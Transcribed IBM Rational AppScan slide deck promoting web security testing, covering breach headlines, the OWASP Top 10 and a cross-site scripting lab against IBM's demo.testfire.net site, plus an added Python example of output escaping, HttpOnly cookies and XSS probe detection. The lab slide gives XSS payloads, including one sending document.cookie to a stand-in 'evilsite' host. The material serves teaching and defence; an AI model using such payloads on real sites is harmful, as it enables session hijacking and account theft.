Rational AppScan & Ounce Products



Transcription:

IBM Software Group Rational AppScan & Ounce Products Presenters Tony Sisson and Frank Sassano 2007 IBM Corporation

The Alarming Truth
- CheckFree warns 5 million customers after hack (http://infosecurity.us/?p=5168), January 9, 2009
- Hannaford Bros. grocery chain: 4 million credit & debit cards exposed (http://www.cnn.com/2008/us/03/18/retail.data.breach.ap/index.html), March 18, 2008
- Montgomery Ward: 51,000 customer credit card numbers... (http://www.scmagazineus.com/report-montgomery-ward-fails-to-alert-victims-of-breach/article/111922/), June 27, 2008
- Target Stores: blind users win $6M suit; Target to make website accessible (http://digg.com/tech_news/blind_users_win_6m_suit_target_to_make_website_accessible), 2008

Bad Press Decreases Shareholder Value: one-day market cap drop of $200M

The Reality: Security and Focus Are Unbalanced
(Chart: security spending versus attacks)
- Web applications: 75% of attacks, 10% of security dollars
- Network / server: 25% of attacks, 90% of security dollars
75% of all attacks on information security are directed to the Web application layer. 2/3 of all Web applications are vulnerable.

The Myth: Our Site Is Safe
- We have firewalls in place
- We audit it once a quarter with pen testers
- We use network vulnerability scanners

High Level Web Application Architecture Review
Client tier (browser, presentation) -> Internet -> Firewall (protects network) -> SSL (protects transport) -> App server (middle tier, business logic; the customer app is deployed here) -> Database (data tier; sensitive data is stored here)

Network Defenses for Web Applications
Security perimeter: Firewall, Intrusion Detection System (IDS), Intrusion Prevention System (IPS), Application Firewall, System Incident Event Management (SIEM). An HTTP request passes through all of them: these devices are designed to "fail securely" by allowing through traffic that they don't understand.

Security Testing Technologies Primer
- Static Code Analysis = Whitebox: looking at the code for security issues (code-level scanning)
- Dynamic Analysis = Blackbox: sending tests to a functioning application
(Diagram: the total set of potential security issues, partly covered by static analysis and partly by dynamic analysis)

Building Security & Compliance into the Software SDLC
Coding -> Build -> QA -> Security -> Production
- Enable Security to effectively drive remediation into development
- Provide developers and testers with expertise on detection and remediation ability
- Ensure vulnerabilities are addressed before applications are put into production

Rational AppScan: End-to-End Web Application Security
- Requirements: requirements definition (security templates); security requirements defined before design & implementation
- Code: Ounce products (Eclipse/VS IDE); build security testing into the IDE*
- Build: AppScan Tester (scan agent & clients); automate security / compliance testing in the build process
- QA: security / compliance testing incorporated into testing & remediation workflows
- Security: AppScan Enterprise / Reporting Console (enterprise-wide scanning and reporting); AppScan Standard (desktop); security & compliance testing, oversight, control, policy, audits
- Production: AppScan OnDemand (SaaS); outsourced testing for security audits & production site monitoring
Application security best practices: address security from the start; security audit solutions for IT Security; security for the development lifecycle

Open Web Application Security Project (OWASP) Top 10 (application threat - negative impact - example impact)
1. Cross-Site Scripting - Identity theft, sensitive information leakage - Hackers can impersonate legitimate users, and control their accounts.
2. Injection Flaws - Attacker can manipulate queries to the DB / LDAP / other system - Hackers can access backend database information, alter it or steal it.
3. Malicious File Execution - Execute shell commands on server, up to full control - Site modified to transfer all interactions to the hacker.
4. Insecure Direct Object Reference - Attacker can access sensitive files and resources - Web application returns contents of sensitive file (instead of harmless one).
5. Cross-Site Request Forgery - Attacker can invoke blind actions on Web applications, impersonating as a trusted user - Blind requests to bank account transfer money to hacker.
6. Information Leakage and Improper Error Handling - Attackers can gain detailed system information - Malicious system reconnaissance may assist in developing further attacks.
7. Broken Authentication & Session Management - Session tokens not guarded or invalidated properly - Hacker can force session token on victim; session tokens can be stolen after logout.
8. Insecure Cryptographic Storage - Weak encryption techniques may lead to broken encryption - Confidential information (SSN, credit cards) can be decrypted by malicious users.
9. Insecure Communications - Sensitive info sent unencrypted over insecure channel - Unencrypted credentials sniffed and used by hacker to impersonate user.
10. Failure to Restrict URL Access - Hacker can access unauthorized resources - Hacker can forcefully browse and access a page past the login page.

Cross-Site Scripting: The Exploit Process (parties: Evil.org, User, bank.com)
1) Link to bank.com sent to user via E-mail or HTTP
2) User sends script embedded as data
3) Script/data returned, executed by browser
4) Script sends user's cookie and session information without the user's consent or knowledge
5) Evil.org uses stolen session information to impersonate user

Lab 1: Profile Web Application, Steal Cookies
The goal of this lab is to:
- profile the demo.testfire.net application
- utilize a Cross-Site Scripting vulnerability on the demo.testfire.net application in order to access cookies on a target user's browser
Search: Super Bowl -> <B>Super Bowl</B>
Search: <script>alert(1)</script>
Search: <script>alert(document.cookie)</script>
Tamperdata - for gathering the Cookie information to send to Grandma!
SEARCH - <script>document.write('<img src=http:// evilsite/'+document.cookie);</script>
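As an added defender-side illustration (not part of the IBM deck), the following Python shows why the lab's search terms execute when a search page reflects them verbatim, and how encoding the reflected term plus an HttpOnly session cookie neutralise steps 3 and 4 of the exploit process above. The cookie name, token, query parameter name and the probe heuristic are constructed assumptions, not demo.testfire.net's own.

```python
import html
import urllib.parse
from http.cookies import SimpleCookie

# Constructed sample inputs: the search terms used on the lab slide.
SEARCH_INPUTS = [
    "Super Bowl",
    "<script>alert(1)</script>",
    "<script>alert(document.cookie)</script>",
    "<script>document.write('<img src=http://evilsite/'+document.cookie);</script>",
]


def render_search_vulnerable(term):
    """Step 3 of the exploit process: the term is reflected verbatim, so any
    markup inside it comes back as markup and the browser executes it."""
    return "<p>Results for: <B>" + term + "</B></p>"


def render_search_hardened(term):
    """Same page, but the term is encoded for the HTML text context, so the
    browser renders the characters instead of interpreting them as markup."""
    return "<p>Results for: <B>" + html.escape(term, quote=True) + "</B></p>"


def contains_script_tag(page_html):
    """Crude check used only to compare the two renderings above."""
    return "<script" in page_html.lower()


def session_cookie_header(token):
    """Mitigates step 4: an HttpOnly cookie is not exposed to document.cookie,
    so even a script that does run cannot read the session token; Secure keeps
    it off plaintext HTTP. Cookie name and token are constructed placeholders."""
    cookie = SimpleCookie()
    cookie["sessionid"] = token
    cookie["sessionid"]["httponly"] = True
    cookie["sessionid"]["secure"] = True
    cookie["sessionid"]["path"] = "/"
    cookie["sessionid"]["samesite"] = "Lax"
    return cookie.output(header="Set-Cookie:").strip()


def is_xss_probe(query_string):
    """Detection helper for access-log review: URL-decodes a query string and
    flags the markers the lab payloads rely on (constructed heuristic for
    triage, not an input filter)."""
    decoded = urllib.parse.unquote_plus(query_string).lower()
    return "<script" in decoded or "document.cookie" in decoded


if __name__ == "__main__":
    for term in SEARCH_INPUTS:
        print("vulnerable:", render_search_vulnerable(term))
        print("hardened  :", render_search_hardened(term))
    print(session_cookie_header("constructed-token-123"))
    print(is_xss_probe("q=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E"))
```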

SQL Injection Example

SQL Injection Example (continued)

SQL Injection Example - Exploit

SQL Injection Example - Outcome

Information Leakage: different user/password errors (verbose login error messages)

Failure to Restrict URL Access - Admin User Login (Privilege Escalation Example): /admin/admin.aspx

Forcefully browse to admin page

Rational AppScan's HTTP-Based Malware Scanning (IBM Confidential)
1. Discover all content and links in a Web application: execute JavaScript & Flash; fill forms and login sequences; analyze secure pages
2. Analyze all content for malicious behavior indicators
3. Compare all links to comprehensive black-lists (link1, link2, link3)

Introducing expanded Rational AppScan/Policy Tester OnDemand
AppScan OnDemand: comprehensive testing of pre-production applications
- Periodic assessment of applications in QA or Security
- Monthly scans
- Flexible offerings (Small/Medium/Large)
- AppScan Tester OnDemand
Production Site Monitoring: continuous scanning of production Web sites for vulnerabilities that may have been introduced after the app went live
- Dynamic or interactive content and forms, online registrations
- Weekly scans
The result: ability to address online risk without in-house resources, with the faster route to actionable information

Watchfire Solutions: The Impact of Securing Flash-based Applications
- Flash is one of the fastest growing security problems; it is in practically every web application
- Flash vulnerabilities: Cross-Site Flashing; Cross-Site Scripting through Flash; Phishing; Flow Manipulation
- Flex: next generation of Flash
- A marketing Flash banner compromises the entire web application
(2008 IBM Corporation)
